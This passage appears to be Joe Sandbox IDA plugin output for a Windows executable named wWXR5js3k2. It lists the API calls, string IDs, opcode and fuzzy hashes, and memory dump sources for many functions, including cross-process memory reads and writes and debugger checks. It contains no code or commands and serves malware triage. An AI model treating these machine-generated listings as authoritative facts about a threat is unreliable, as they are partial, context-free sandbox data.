                                                    • API ID: MessageSend$Timeout_strlen
                                                    • String ID: @U=u
                                                    • API String ID: 2777139624-2594219639
                                                    • Opcode ID: 2a4c6e377a2a90883dbcf5b9c628f3e93712095f45f9a394adb0409a1d6ce6eb
                                                    • Instruction ID: 5774d4909e4638a9fece646b71351495b7561cc4fa7c5650a73cfcfff8ac5b80
                                                    • Opcode Fuzzy Hash: 2a4c6e377a2a90883dbcf5b9c628f3e93712095f45f9a394adb0409a1d6ce6eb
                                                    • Instruction Fuzzy Hash: 8911083220020666CB54BEB8D9829FF77AB9F4A300F00506FFA06CA293DF258C45CA59
                                                    APIs
                                                      • Part of subcall function 006B55FD: GetLocalTime.KERNEL32 ref: 006B560A
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B563F
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B5671
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B56A4
                                                      • Part of subcall function 006B55FD: _wcsncpy.LIBCMT ref: 006B56E6
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 006D68FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalMessageSendTime
                                                    • String ID: @U=u$SysDateTimePick32
                                                    • API String ID: 2466184910-2530228043
                                                    • Opcode ID: f054e947744ba35143e7ee374585af32d61bfac1007240860543b5467eda9057
                                                    • Instruction ID: 803de11a1d1d1d172956f54bb50452299a284ad035cb106481505bf550d28329
                                                    • Opcode Fuzzy Hash: f054e947744ba35143e7ee374585af32d61bfac1007240860543b5467eda9057
                                                    • Instruction Fuzzy Hash: D3210671B40209AFEF219E14DC82FEA73ABEB44760F20451AF950AB3D0D6B5AC819760
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A923E
                                                      • Part of subcall function 006B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006B1409
                                                      • Part of subcall function 006B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B1419
                                                      • Part of subcall function 006B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B142F
                                                      • Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 006A92A5
                                                      • Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @U=u
                                                    • API String ID: 1045663743-2594219639
                                                    • Opcode ID: e8c1f6c8fce20a70f45d705aa1e8b6843d3de29cccd2fd6a54a658b98d21da65
                                                    • Instruction ID: cd5683cd4f05fd3ef535ff0c1b6ecc9151830b4ed9fb3b5f53472219ffa6295f
                                                    • Opcode Fuzzy Hash: e8c1f6c8fce20a70f45d705aa1e8b6843d3de29cccd2fd6a54a658b98d21da65
                                                    • Instruction Fuzzy Hash: 6E215171902118BBDF51ABA4DC81FDDBBB5FF0A310F1041A9F548A7191DA705E84CFA4
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006D6761
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D676C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 139c1596cf0627ff972da2e989d3aac06975598f22d6f8e77cbec034faac6f37
                                                    • Instruction ID: 33e3cdcfd6df62d10c4219d6f0c0d8b7efc77ac52e0c743199aef06915aeb7d1
                                                    • Opcode Fuzzy Hash: 139c1596cf0627ff972da2e989d3aac06975598f22d6f8e77cbec034faac6f37
                                                    • Instruction Fuzzy Hash: A311B271B00208AFEF11CF54CC81EEB376BEB883A8F10422AF91497391D675DC5187A0
                                                    APIs
                                                      • Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
                                                      • Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
                                                      • Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91
                                                    • GetWindowRect.USER32(00000000,?), ref: 006D6C71
                                                    • GetSysColor.USER32(00000012), ref: 006D6C8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 1beba49ed4bb60fd375aa62d53dabefacb5a1865937b9dfc1a2d05360407818d
                                                    • Instruction ID: 60b8e6ca34e4cb96453b794dd7964b8402ef7a89cbc0c0f2dd674fe4b7e122d7
                                                    • Opcode Fuzzy Hash: 1beba49ed4bb60fd375aa62d53dabefacb5a1865937b9dfc1a2d05360407818d
                                                    • Instruction Fuzzy Hash: 3D211772A20209AFDB04DFA8CC45EEA7BA9FB08315F01462AF995D2250D635E8519B60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateMenuPopup
                                                    • String ID: hW
                                                    • API String ID: 3826294624-1300829777
                                                    • Opcode ID: 891cadc90025de4f9168ec7027a2a848ba6e899944856757d9cf2f46dc6ecccf
                                                    • Instruction ID: 43d73bede3c3e4d6bf2d1b31112d3474a7f2dc2df0e90119e655433aa6af759b
                                                    • Opcode Fuzzy Hash: 891cadc90025de4f9168ec7027a2a848ba6e899944856757d9cf2f46dc6ecccf
                                                    • Instruction Fuzzy Hash: EF215C78900609DFCB24CF28D444BD677F2FB8A324F49856AE85A8B391C331AC56DF61
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2A22
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006B2A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 11aa42b0d631d193dc21d11881d4d0b8cb7a5557a75521fc68270878bf7c0f04
                                                    • Instruction ID: f362e07e655105080f291c99b550dea2dcf3cfdf64a92a4a3af3c35c563c23a2
                                                    • Opcode Fuzzy Hash: 11aa42b0d631d193dc21d11881d4d0b8cb7a5557a75521fc68270878bf7c0f04
                                                    • Instruction Fuzzy Hash: 5F11E6B2D01116EBCB34EB58DC54BDA77FAAB85300F048021E955E7390D730AD86C795
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006C222C
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006C2255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 77c1dfffcdc6e10066de6a1daad7b6bd2d8981918762a54a0aa6032300e36c38
                                                    • Instruction ID: 36d4f2ca712dc59c9a9fa71b021a27d55bc811372834a47c932eb3faa858efc2
                                                    • Opcode Fuzzy Hash: 77c1dfffcdc6e10066de6a1daad7b6bd2d8981918762a54a0aa6032300e36c38
                                                    • Instruction Fuzzy Hash: A711E0B0501226BADB248F118CA8FFBFBAAFF06361F10822EFE0546100D2745A81D6F0
                                                    APIs
                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 006D662C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u$button
                                                    • API String ID: 3850602802-1762282863
                                                    • Opcode ID: a5579b47180994f318b3a93da8bc96b86b520335a3b1dc47a5e89670344c200e
                                                    • Instruction ID: 9dedb84067016df8c3d3b19b96bbcea314582c0f8536203d86a133e7db9e181f
                                                    • Opcode Fuzzy Hash: a5579b47180994f318b3a93da8bc96b86b520335a3b1dc47a5e89670344c200e
                                                    • Instruction Fuzzy Hash: 9311E172240205ABDF118F60DC11FEA376BEF58314F154219FA51A72D0C776EC929B50
                                                    APIs
                                                    • SendMessageW.USER32(?,0000133E,00000000,?), ref: 006D78D8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: 5ae0d58ede84b0e71c697cbf2f0ae8e0db81a545ba982e41648464b6307c96d3
                                                    • Instruction ID: 262189aea3055dfbb0497da80ab0b663b5cbd7117fc63b2da18ffab1754c7e11
                                                    • Opcode Fuzzy Hash: 5ae0d58ede84b0e71c697cbf2f0ae8e0db81a545ba982e41648464b6307c96d3
                                                    • Instruction Fuzzy Hash: 1E11E631904744AFD721CF34C8A1AE7B7EAFF05310F50851EE8AA4B391EB716941DB60
                                                    APIs
                                                      • Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
                                                    • SendMessageW.USER32(?,0000102B,?,00000000), ref: 006A9509
                                                    • SendMessageW.USER32(?,0000102B,?,00000000), ref: 006A952E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MemoryProcessWrite
                                                    • String ID: @U=u
                                                    • API String ID: 1195347164-2594219639
                                                    • Opcode ID: 530604f613c2014d825ff75ce999c33edf1636ab1ac74644d9d90faf44e3e8d7
                                                    • Instruction ID: a97c8721cd13aaa9d081f0f8d3ac07ce2cc11d56a5e8e10b8aa8d13b62b053a8
                                                    • Opcode Fuzzy Hash: 530604f613c2014d825ff75ce999c33edf1636ab1ac74644d9d90faf44e3e8d7
                                                    • Instruction Fuzzy Hash: 26012B32901118BBDB11AF68DC46EEEBB79DB05310F10416EF915A71D1DB706D95CFA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: hW
                                                    • API String ID: 0-1300829777
                                                    • Opcode ID: 9aa95378242e3838fb5369dcd9705b28c2038387c95afe2e5c84f488a2426d76
                                                    • Instruction ID: a049f051c76b1ed5db1e9d185d5e895adbeb346d32fe10c441325f6a1c9bb67c
                                                    • Opcode Fuzzy Hash: 9aa95378242e3838fb5369dcd9705b28c2038387c95afe2e5c84f488a2426d76
                                                    • Instruction Fuzzy Hash: 9A111634600604EFCB24AF28C841AA57BE6BB89320F148259EA699B3A0C771E945CF90
                                                    APIs
                                                    • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 006A95FB
                                                    • SendMessageW.USER32(?,0000040D,?,00000000), ref: 006A962E
                                                      • Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MemoryProcessRead_memmove
                                                    • String ID: @U=u
                                                    • API String ID: 339422723-2594219639
                                                    • Opcode ID: 48b233d9a7426c755f2aa886dd769fb588390f7df81cc6b9630dd98d28beda23
                                                    • Instruction ID: 3986f45125a215197ddd315b87cc92b00fefc6ce64817e1744235c6caaa8bb9e
                                                    • Opcode Fuzzy Hash: 48b233d9a7426c755f2aa886dd769fb588390f7df81cc6b9630dd98d28beda23
                                                    • Instruction Fuzzy Hash: F1015B71801118AFDB90AF54DC91ED977ADEB15340F80C0AAB64996151DE314E89CF94
APIs
• VariantInit.OLEAUT32(?), ref: 006AC534
  • Part of subcall function 006AC816: _memmove.LIBCMT ref: 006AC860
  • Part of subcall function 006AC816: VariantInit.OLEAUT32(00000000), ref: 006AC882
  • Part of subcall function 006AC816: VariantCopy.OLEAUT32(00000000,?), ref: 006AC88C
• VariantClear.OLEAUT32(?), ref: 006AC556
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}p
• API String ID: 2932060187-2047593577
• Opcode ID: 3ce53d165323b04d2cdbfd234b503601f65e7500c09068b23cae95d2dd023d41
• Instruction ID: 7311af2760430a6fc795ca3a43783c6c7bc5961f493c396e33cc5367813a9a8b
• Opcode Fuzzy Hash: 3ce53d165323b04d2cdbfd234b503601f65e7500c09068b23cae95d2dd023d41
• Instruction Fuzzy Hash: 37110C719007089FC710DFAAD88489AF7F8FF08310B50862FE58AD7651E771AA48CFA4
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A954C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006A9564
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u
• API String ID: 3850602802-2594219639
• Opcode ID: 79c9c682826fa668cc9c30146b609ad9020ea543123e65361e0a4570594c81bd
• Instruction ID: 21ec5c7b84466805756301d64268c1e1f96c58e3bb521d0980c58263f936e019
• Opcode Fuzzy Hash: 79c9c682826fa668cc9c30146b609ad9020ea543123e65361e0a4570594c81bd
• Instruction Fuzzy Hash: 3AE02B35F4235176F23126258C4BFD71F0BDB8BB61F208035B702991D1C9D24D428AB0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: b647503e6e042de51781fd1119a85ed4909f647ba474854e4d93fa74304ca2cd
• Instruction ID: b2fb174bd0f6e437826875cf41be598627ebabc6fa470f24b730039e782ce1bb
• Opcode Fuzzy Hash: b647503e6e042de51781fd1119a85ed4909f647ba474854e4d93fa74304ca2cd
• Instruction Fuzzy Hash: 8BE02272A002282AE3209B99AC09BE7FBACEB84B60F00002BFC04D3181D9709A5187E4
APIs
  • Part of subcall function 0068B314: _memset.LIBCMT ref: 0068B321
  • Part of subcall function 00670940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0068B2F0,?,?,?,0065100A), ref: 00670945
• IsDebuggerPresent.KERNEL32(?,?,?,0065100A), ref: 0068B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0065100A), ref: 0068B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0068B2FE
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 334da24efc802147e95e3a87e0af9e090656dcbcfd73bc128a2f9d4b9bb4fa3e
• Instruction ID: 11a018b10f74ea612a74c51cec1e74686e269a1cf7d59ceee934a4f09b4a3d5d
• Opcode Fuzzy Hash: 334da24efc802147e95e3a87e0af9e090656dcbcfd73bc128a2f9d4b9bb4fa3e
• Instruction Fuzzy Hash: AEE06DB0600702CBE760AF28D8043427BE6BF04304F059A2DE856C7290E7B4D448CBA1
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00691775
  • Part of subcall function 006CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0069195E,?), ref: 006CBFFE
  • Part of subcall function 006CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006CC010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0069196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 703e8976f07d3c0af1bb3e1602a3e9f2fae8d2b3dbb5c669ec02abfd590a8cde
• Instruction ID: 26696a7777a949c6f6e050a5dccbf2079959dbe1ba08bff71e244134c105831b
• Opcode Fuzzy Hash: 703e8976f07d3c0af1bb3e1602a3e9f2fae8d2b3dbb5c669ec02abfd590a8cde
• Instruction Fuzzy Hash: A7F0C97080110ADFDF15DB95C984AECBBFEEB09301F64109AE112AA590D7754F85DF64
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006D596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006D5981
  • Part of subcall function 006B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
• Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
